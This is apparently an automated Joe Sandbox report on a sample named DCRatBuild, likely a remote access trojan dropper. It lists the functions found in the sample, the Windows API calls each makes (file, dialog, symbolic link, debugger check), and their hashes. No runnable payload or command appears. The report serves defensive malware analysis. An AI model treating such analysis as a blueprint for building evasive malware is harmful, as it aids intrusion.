                                      • Opcode ID: 56aecddfd006440a59d9e3333b47ea140f5216c2779755d76f4b1ec8f2d13f49
                                      • Instruction ID: 908ef4e4094abc01e19b2aad708008a1b43de1a1c70bd0e817d36cff2ec3ee16
                                      • Opcode Fuzzy Hash: 56aecddfd006440a59d9e3333b47ea140f5216c2779755d76f4b1ec8f2d13f49
                                      • Instruction Fuzzy Hash: B2A0029626D5057C714CB151AD26D7B126CD4D1B21730451AB50694145955859867831
                                      Function 00F1DBF7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1DBD5
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 728da12ff1256a13a815bf415b2422e1c62453284ed8c09f46002b2dfc41b851
                                      • Instruction ID: dbed972b2569498ebf3e0ed0d725f4428c9ea3385adb5a1419e4a4dee752e35a
                                      • Opcode Fuzzy Hash: 728da12ff1256a13a815bf415b2422e1c62453284ed8c09f46002b2dfc41b851
                                      • Instruction Fuzzy Hash: 7AA0029726D1077C710852556D17DB6123CD4C5B617314519B507940419A545DC57431
                                      Function 00F1DC44 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1DC36
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 03aadead765f0f92867cda1766d22f7b0622beea5b75524d3fb19ed37f044ef6
                                      • Instruction ID: 4f0fcf398ddb066d020f8b59fa9f2d31fe4e878bbd11ece106c387970c425da2
                                      • Opcode Fuzzy Hash: 03aadead765f0f92867cda1766d22f7b0622beea5b75524d3fb19ed37f044ef6
                                      • Instruction Fuzzy Hash: E0A0029756D1067CB10C61556D16EB6123CC4C5B617304D1DB5069415155845DC57871
                                      Function 00F1DC4E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1DC36
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 5d2845450b8718c00549863c7ee0ededa5add8cf274b3052d65cbe42d09cc676
                                      • Instruction ID: 4f0fcf398ddb066d020f8b59fa9f2d31fe4e878bbd11ece106c387970c425da2
                                      • Opcode Fuzzy Hash: 5d2845450b8718c00549863c7ee0ededa5add8cf274b3052d65cbe42d09cc676
                                      • Instruction Fuzzy Hash: E0A0029756D1067CB10C61556D16EB6123CC4C5B617304D1DB5069415155845DC57871
                                      Function 00F1DC15 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1DBD5
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 0c2f05cee239e93e77c635a53072f6bf3e0dc0caeff9d1d2a60badc7a23919cc
                                      • Instruction ID: dbed972b2569498ebf3e0ed0d725f4428c9ea3385adb5a1419e4a4dee752e35a
                                      • Opcode Fuzzy Hash: 0c2f05cee239e93e77c635a53072f6bf3e0dc0caeff9d1d2a60badc7a23919cc
                                      • Instruction Fuzzy Hash: 7AA0029726D1077C710852556D17DB6123CD4C5B617314519B507940419A545DC57431
                                      Function 00F1DC1F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1DBD5
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: a750848f34dfaa190749249f4dcb7eda96f66626cefb413f96f8b38bd5511ce6
                                      • Instruction ID: dbed972b2569498ebf3e0ed0d725f4428c9ea3385adb5a1419e4a4dee752e35a
                                      • Opcode Fuzzy Hash: a750848f34dfaa190749249f4dcb7eda96f66626cefb413f96f8b38bd5511ce6
                                      • Instruction Fuzzy Hash: 7AA0029726D1077C710852556D17DB6123CD4C5B617314519B507940419A545DC57431
                                      Function 00F1DC0B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1DBD5
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 82d6815040c202edf7f30274c94943d41624bd70c765ae8c18405fd9aa168ddc
                                      • Instruction ID: dbed972b2569498ebf3e0ed0d725f4428c9ea3385adb5a1419e4a4dee752e35a
                                      • Opcode Fuzzy Hash: 82d6815040c202edf7f30274c94943d41624bd70c765ae8c18405fd9aa168ddc
                                      • Instruction Fuzzy Hash: 7AA0029726D1077C710852556D17DB6123CD4C5B617314519B507940419A545DC57431
                                      Function 00F09EBF Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SetEndOfFile.KERNELBASE(?,00F09104,?,?,-00001964), ref: 00F09EC2
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: File
                                      • String ID:
                                      • API String ID: 749574446-0
                                      • Opcode ID: 9ed0f4ae9c3fa072e965d2f3d6338a7b09cb02f2d1850531c74f207227bb5d58
                                      • Instruction ID: c8339106a22a00c6253a985f0f29ccfce971382a0ad92978baaf1be5613e1383
                                      • Opcode Fuzzy Hash: 9ed0f4ae9c3fa072e965d2f3d6338a7b09cb02f2d1850531c74f207227bb5d58
                                      • Instruction Fuzzy Hash: 22B011B00A800A8A8E002B30CE088283A22EA2230A30082A0A002CA0A0CB22C002AA00
                                      Function 00F1A322 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetCurrentDirectoryW.KERNELBASE(?,00F1A587,C:\Users\user\Desktop,00000000,00F4946A,00000006), ref: 00F1A326
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: CurrentDirectory
                                      • String ID:
                                      • API String ID: 1611563598-0
                                      • Opcode ID: a83f015f4a80b9d84f4d2fca7bb0a89d7923e0e9cd47a1626c0c6a6420a118f3
                                      • Instruction ID: 6c693baa00d17d94373cf7ad0c81dc8c7d20e02d9e853ecd0208765062ce1bb5
                                      • Opcode Fuzzy Hash: a83f015f4a80b9d84f4d2fca7bb0a89d7923e0e9cd47a1626c0c6a6420a118f3
                                      • Instruction Fuzzy Hash: F9A0123019400A568A005B30CC09C1576515760713F0086207002C00A0CB308814B500

                                      Non-executed Functions

                                      Function 00F1B8E0 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00F0130B: GetDlgItem.USER32(00000000,00003021), ref: 00F0134F
                                        • Part of subcall function 00F0130B: SetWindowTextW.USER32(00000000,00F335B4), ref: 00F01365
                                      • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00F1B971
                                      • EndDialog.USER32(?,00000006), ref: 00F1B984
                                      • GetDlgItem.USER32(?,0000006C), ref: 00F1B9A0
                                      • SetFocus.USER32(00000000), ref: 00F1B9A7
                                      • SetDlgItemTextW.USER32(?,00000065,?), ref: 00F1B9E1
                                      • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00F1BA18
                                      • FindFirstFileW.KERNEL32(?,?), ref: 00F1BA2E
                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F1BA4C
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F1BA5C
                                      • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00F1BA78
                                      • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00F1BA94
                                      • _swprintf.LIBCMT ref: 00F1BAC4
                                        • Part of subcall function 00F0400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F0401D
                                      • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00F1BAD7
                                      • FindClose.KERNEL32(00000000), ref: 00F1BADE
                                      • _swprintf.LIBCMT ref: 00F1BB37
                                      • SetDlgItemTextW.USER32(?,00000068,?), ref: 00F1BB4A
                                      • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00F1BB67
                                      • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00F1BB87
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F1BB97
                                      • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00F1BBB1
                                      • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00F1BBC9
                                      • _swprintf.LIBCMT ref: 00F1BBF5
                                      • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00F1BC08
                                      • _swprintf.LIBCMT ref: 00F1BC5C
                                      • SetDlgItemTextW.USER32(?,00000069,?), ref: 00F1BC6F
                                        • Part of subcall function 00F1A63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00F1A662
                                        • Part of subcall function 00F1A63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,00F3E600,?,?), ref: 00F1A6B1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                      • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                      • API String ID: 797121971-1840816070
                                      • Opcode ID: ed36c1d8e7e5cecf016c25b5a47432cdef2bef84bd153cb27186535131e924ae
                                      • Instruction ID: 83caf2af9e4bf667269a7624347e4624a8e8ff17a1cf84f9199ca3837f7120dc
                                      • Opcode Fuzzy Hash: ed36c1d8e7e5cecf016c25b5a47432cdef2bef84bd153cb27186535131e924ae
                                      • Instruction Fuzzy Hash: A691D4B2608348BBD731DBA0CC49FFB77ACEB4A710F040819F749D2081DB75A605AB62
                                      Function 00F0718C Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 296fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00F07191
                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 00F072F1
                                      • CloseHandle.KERNEL32(00000000), ref: 00F07301
                                        • Part of subcall function 00F07BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00F07C04
                                        • Part of subcall function 00F07BF5: GetLastError.KERNEL32 ref: 00F07C4A
                                        • Part of subcall function 00F07BF5: CloseHandle.KERNEL32(?), ref: 00F07C59
                                      • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 00F0730C
                                      • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00F0741A
                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00F07446
                                      • CloseHandle.KERNEL32(?), ref: 00F07457
                                      • GetLastError.KERNEL32 ref: 00F07467
                                      • RemoveDirectoryW.KERNEL32(?), ref: 00F074B3
                                      • DeleteFileW.KERNEL32(?), ref: 00F074DB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                                      • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                      • API String ID: 3935142422-3508440684
                                      • Opcode ID: 6ba88aa1a85bc1700b9a6cbdf5e4c33262dfcba0aaec2c893ea73bb32cfcba62
                                      • Instruction ID: adff1aba7523d248ceba6d269433fe3e5f0508213faee78be21cceca4d1bbcd7
                                      • Opcode Fuzzy Hash: 6ba88aa1a85bc1700b9a6cbdf5e4c33262dfcba0aaec2c893ea73bb32cfcba62
                                      • Instruction Fuzzy Hash: D7B1E371D04319EADF20EB60DC41BEE7BB8AF04314F0440A9F949E7182D738BA49EB61
                                      Function 00F2866F Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00F28767
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00F28771
                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00F2877E
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                      • String ID:
                                      • API String ID: 3906539128-0
                                      • Opcode ID: b6a35a96ffd9694d0c34a9307e3549acf734ae2a91f3093b085959b3dab3a32b
                                      • Instruction ID: 3428b4a47aa8052de3567959d9b73e1da1fb8591351addd2ea07264f1b7caaa4
                                      • Opcode Fuzzy Hash: b6a35a96ffd9694d0c34a9307e3549acf734ae2a91f3093b085959b3dab3a32b
                                      • Instruction Fuzzy Hash: 8231B475D0122D9BCB21DF64DC89BDCBBB4AF18310F5041EAE81CA7251EB349B859F45
                                      Function 00F2AAA8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: .
                                      • API String ID: 0-248832578
                                      • Opcode ID: b5e93fec27d4a876972079183642eb28d40dc193e27cb0c83bbeff2b2229acc1
                                      • Instruction ID: 742678fe4f5257ebff0808183ddeb27bdd5f40cf3523f17785f665081a8fc354
                                      • Opcode Fuzzy Hash: b5e93fec27d4a876972079183642eb28d40dc193e27cb0c83bbeff2b2229acc1
                                      • Instruction Fuzzy Hash: 61310471900229AFCB249E78EC85EEBBBBEDF85324F1401A8F418D7251E6349D45DB50
                                      Function 00F1A63C Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00F1A662
                                      • GetNumberFormatW.KERNEL32(00000400,00000000,?,00F3E600,?,?), ref: 00F1A6B1
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: FormatInfoLocaleNumber
                                      • String ID:
                                      • API String ID: 2169056816-0
                                      • Opcode ID: cb3a4186f27b7f6c0060dfd87ac5fe531bdeb25b20ee358ab54ab496b23c8a92
                                      • Instruction ID: b9ad27b5f5ce42d7257223481bde54277cd9b3ab4cc1f88234fe8921ee464a28
                                      • Opcode Fuzzy Hash: cb3a4186f27b7f6c0060dfd87ac5fe531bdeb25b20ee358ab54ab496b23c8a92
                                      • Instruction Fuzzy Hash: B8015A3661030CBADB10DFA5EC0AFAB77BCEF19721F004462BA0497191D3709A24EBA5
                                      Function 00F06EC9 Relevance: 3.0, APIs: 2, Instructions: 17windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(00F1117C,?,00000200), ref: 00F06EC9
                                      • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00F06EEA
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: ErrorFormatLastMessage
                                      • String ID:
                                      • API String ID: 3479602957-0
